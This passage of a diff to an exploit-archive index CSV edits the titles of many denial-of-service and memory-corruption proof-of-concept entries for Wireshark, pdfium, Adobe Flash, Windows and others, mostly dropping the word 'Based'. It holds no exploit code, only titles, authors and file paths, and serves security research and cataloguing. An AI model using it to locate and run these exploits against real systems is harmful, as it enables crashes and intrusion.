Out-of-Bounds Read",2015-11-09,"Google Security Research",dos,multiple, -38681,exploits/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",dos,linux, -38685,exploits/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",dos,linux, +38662,exploits/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Out-of-Bounds Read",2015-11-09,"Google Security Research",dos,multiple, +38681,exploits/linux/dos/38681.py,"FBZX 2.10 - Local Stack Buffer Overflow",2015-11-11,"Juan Sacco",dos,linux, +38685,exploits/linux/dos/38685.py,"TACK 1.07 - Local Stack Buffer Overflow",2015-11-12,"Juan Sacco",dos,linux, 38687,exploits/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",dos,windows, 38701,exploits/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,dos,windows, 38702,exploits/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,dos,windows, @@ -4857,7 +4857,7 @@ id,file,description,date,author,type,platform,port 38796,exploits/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",dos,windows, 38798,exploits/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,dos,multiple, 38854,exploits/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",dos,linux, -38857,exploits/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",dos,linux, +38857,exploits/linux/dos/38857.md,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",dos,linux, 38858,exploits/windows/dos/38858.txt,"Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)",2015-12-03,"Francis Provencher",dos,windows, 38878,exploits/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash (PoC)",2015-12-06,Un_N0n,dos,windows, 38909,exploits/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",dos,linux, @@ -4877,21 +4877,21 @@ id,file,description,date,author,type,platform,port 38978,exploits/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",dos,windows,11460 38979,exploits/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",dos,windows,11460 38980,exploits/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",dos,windows,11460 -38992,exploits/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, -38993,exploits/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38992,exploits/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38993,exploits/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, 38994,exploits/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",dos,multiple, 38995,exploits/multiple/dos/38995.txt,"Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, 38996,exploits/multiple/dos/38996.txt,"Wireshark - dissct_rsl_ipaccess_msg Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, -38997,exploits/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38997,exploits/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, 38998,exploits/multiple/dos/38998.txt,"Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV",2015-12-16,"Google Security Research",dos,multiple, 38999,exploits/multiple/dos/38999.txt,"Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV",2015-12-16,"Google Security Research",dos,multiple, 39000,exploits/multiple/dos/39000.txt,"Wireshark - my_dgt_tbcd_unpack Static Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, 39001,exploits/multiple/dos/39001.txt,"Wireshark - ascend_seek Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, 39002,exploits/multiple/dos/39002.txt,"Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free",2015-12-16,"Google Security Research",dos,multiple, -39003,exploits/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, -39004,exploits/multiple/dos/39004.txt,"Wireshark - find_signature Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, -39005,exploits/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, -39006,exploits/multiple/dos/39006.txt,"Wireshark - getRate Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39003,exploits/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39004,exploits/multiple/dos/39004.txt,"Wireshark - find_signature Stack Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39005,exploits/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39006,exploits/multiple/dos/39006.txt,"Wireshark - getRate Stack Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, 39019,exploits/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",dos,windows, 39020,exploits/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",dos,windows, 39021,exploits/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",dos,windows, @@ -4924,8 +4924,8 @@ id,file,description,date,author,type,platform,port 39070,exploits/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,dos,windows, 39072,exploits/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",dos,win_x86-64, 39073,exploits/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",dos,cgi, -39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",dos,multiple, -39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",dos,multiple, +39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read",2015-12-22,"Google Security Research",dos,multiple, +39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",dos,multiple, 39082,exploits/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",dos,multiple, 39091,exploits/php/dos/39091.pl,"WHMCompleteSolution (WHMCS) 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,dos,php, 39092,exploits/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,dos,php, @@ -4935,10 +4935,10 @@ id,file,description,date,author,type,platform,port 39225,exploits/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",dos,hardware, 39226,exploits/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash (PoC)",2016-01-12,"Daniel Velazquez",dos,windows, 39158,exploits/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - Denial of Service",2016-01-03,Vishnu,dos,windows, -39162,exploits/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, -39163,exploits/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, +39162,exploits/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, +39163,exploits/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, 39164,exploits/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",dos,multiple, -39165,exploits/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",dos,multiple, +39165,exploits/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Buffer Overflow",2016-01-04,"Google Security Research",dos,multiple, 39169,exploits/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",dos,multiple, 39177,exploits/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",dos,multiple, 39180,exploits/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",dos,windows, @@ -4963,13 +4963,13 @@ id,file,description,date,author,type,platform,port 39375,exploits/osx/dos/39375.c,"Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",dos,osx, 39308,exploits/linux/dos/39308.c,"Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",dos,linux, 39315,exploits/hardware/dos/39315.pl,"Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",dos,hardware, -39321,exploits/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39322,exploits/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39323,exploits/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39324,exploits/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow",2016-01-26,"Google Security Research",dos,multiple, +39321,exploits/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39322,exploits/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39323,exploits/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39324,exploits/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Buffer Overflow",2016-01-26,"Google Security Research",dos,multiple, 39325,exploits/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, 39329,exploits/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",dos,windows, 39330,exploits/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",dos,windows, 39331,exploits/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,dos,windows, @@ -5014,7 +5014,7 @@ id,file,description,date,author,type,platform,port 39445,exploits/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",dos,linux, 39447,exploits/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,dos,windows, 39452,exploits/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,dos,windows, -39454,exploits/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",dos,linux, +39454,exploits/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Buffer Overflow (PoC)",2016-02-16,"Google Security Research",dos,linux, 39460,exploits/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",dos,multiple, 39461,exploits/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",dos,multiple, 39462,exploits/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",dos,multiple, @@ -5032,11 +5032,11 @@ id,file,description,date,author,type,platform,port 39483,exploits/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, 39484,exploits/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, 39487,exploits/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",dos,multiple, -39490,exploits/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow",2016-02-24,"Google Security Research",dos,multiple, -39491,exploits/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, -39492,exploits/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, -39493,exploits/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, -39494,exploits/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39490,exploits/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Buffer Overflow",2016-02-24,"Google Security Research",dos,multiple, +39491,exploits/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39492,exploits/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39493,exploits/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39494,exploits/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, 39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - Crash (PoC)",2016-02-26,"David Silveiro",dos,linux, 39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",dos,multiple, 39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",dos,android, @@ -5091,8 +5091,8 @@ id,file,description,date,author,type,platform,port 39633,exploits/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1)",2016-03-30,"Francis Provencher",dos,multiple, 39634,exploits/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2)",2016-03-30,"Francis Provencher",dos,multiple, 39635,exploits/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption",2016-03-30,"Francis Provencher",dos,multiple, -39638,exploits/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",dos,linux, -39644,exploits/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",dos,multiple, +39638,exploits/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Buffer Overflow",2016-03-30,"Stelios Tsampas",dos,linux, +39644,exploits/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Out-of-Bounds Read",2016-03-31,"Google Security Research",dos,multiple, 39647,exploits/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",dos,windows, 39648,exploits/windows/dos/39648.txt,"Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",dos,windows, 39649,exploits/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",dos,multiple, @@ -5114,7 +5114,7 @@ id,file,description,date,author,type,platform,port 39740,exploits/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",dos,windows, 39743,exploits/windows/dos/39743.txt,"Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",dos,windows, 39747,exploits/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",dos,linux, -39748,exploits/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow",2016-04-29,"Google Security Research",dos,multiple, +39748,exploits/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Buffer Overflow",2016-04-29,"Google Security Research",dos,multiple, 39749,exploits/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",dos,multiple, 39750,exploits/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",dos,multiple, 39767,exploits/multiple/dos/39767.txt,"ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",dos,multiple, @@ -5137,7 +5137,7 @@ id,file,description,date,author,type,platform,port 39800,exploits/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,dos,linux, 39801,exploits/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,dos,android, 39802,exploits/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",dos,windows, -39812,exploits/multiple/dos/39812.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2)",2016-05-13,"Google Security Research",dos,multiple, +39812,exploits/multiple/dos/39812.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (2)",2016-05-13,"Google Security Research",dos,multiple, 39819,exploits/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,dos,windows, 39824,exploits/multiple/dos/39824.txt,"Adobe Flash - JXR Processing Out-of-Bounds Read",2016-05-17,"Google Security Research",dos,multiple, 39825,exploits/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",dos,multiple, @@ -5149,16 +5149,16 @@ id,file,description,date,author,type,platform,port 39831,exploits/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",dos,multiple, 39832,exploits/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",dos,windows, 39833,exploits/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",dos,windows, -39834,exploits/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",dos,multiple, +39834,exploits/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",dos,multiple, 39835,exploits/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",dos,multiple, 39842,exploits/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,dos,linux, 39846,exploits/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,dos,windows, 39857,exploits/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,dos,windows, -39859,exploits/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow",2016-05-26,"Google Security Research",dos,multiple, -39860,exploits/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Based Overreads",2016-05-26,"Google Security Research",dos,multiple, -39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread",2016-05-26,"Google Security Research",dos,multiple, -39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread",2016-05-26,"Google Security Research",dos,multiple, -39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",dos,multiple, +39859,exploits/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Buffer Overflow",2016-05-26,"Google Security Research",dos,multiple, +39860,exploits/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Overreads",2016-05-26,"Google Security Research",dos,multiple, +39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Overread",2016-05-26,"Google Security Research",dos,multiple, +39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Overread",2016-05-26,"Google Security Research",dos,multiple, +39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Out-of-Bounds Reads",2016-05-26,"Google Security Research",dos,multiple, 39867,exploits/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",dos,multiple, 39873,exploits/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux, 39875,exploits/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux, @@ -5178,7 +5178,7 @@ id,file,description,date,author,type,platform,port 39929,exploits/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",dos,multiple, 39930,exploits/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",dos,osx, 39939,exploits/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,dos,linux, -39940,exploits/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",dos,linux, +39940,exploits/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Memory Corruption",2016-06-13,"Google Security Research",dos,linux, 39941,exploits/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",dos,linux, 39942,exploits/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",dos,linux, 39943,exploits/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",dos,linux, @@ -5188,7 +5188,7 @@ id,file,description,date,author,type,platform,port 39960,exploits/windows/dos/39960.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",dos,windows, 39961,exploits/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",dos,linux, 39986,exploits/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",dos,linux, -39990,exploits/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",dos,windows, +39990,exploits/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",dos,windows, 39991,exploits/windows/dos/39991.txt,"Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",dos,windows, 39993,exploits/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",dos,win_x86, 39994,exploits/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,dos,windows, @@ -5222,7 +5222,7 @@ id,file,description,date,author,type,platform,port 40253,exploits/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",dos,windows, 40255,exploits/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",dos,windows, 40256,exploits/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",dos,windows, -40257,exploits/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",dos,windows, +40257,exploits/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",dos,windows, 40308,exploits/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, 40289,exploits/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",dos,hardware, 40291,exploits/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",dos,linux, @@ -5383,7 +5383,7 @@ id,file,description,date,author,type,platform,port 41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent 